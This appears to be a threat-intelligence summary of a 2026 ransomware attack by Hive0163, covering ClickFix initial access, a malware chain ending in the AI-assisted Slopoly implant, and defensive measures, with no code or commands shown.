The financially motivated threat actor Hive0163 utilized AI-assisted Slopoly malware in a ransomware attack observed in early 2026. The attack began with a ClickFix social engineering tactic, leading to the deployment of NodeSnake, then Interlock RAT, and finally Slopoly, which maintained persistent access for over a week, enabling data exfiltration and ransomware deployment.
Initial Access
ClickFix Social Engineering
confirmed
Threat actor Hive0163 used the 'ClickFix' social engineering tactic to trick a victim into running a PowerShell command, initiating the attack chain.
Defender cut points
User awareness training on social engineering tacticsEmail filtering and web proxies to block malicious linksEndpoint detection and response (EDR) to flag suspicious user-initiated command execution
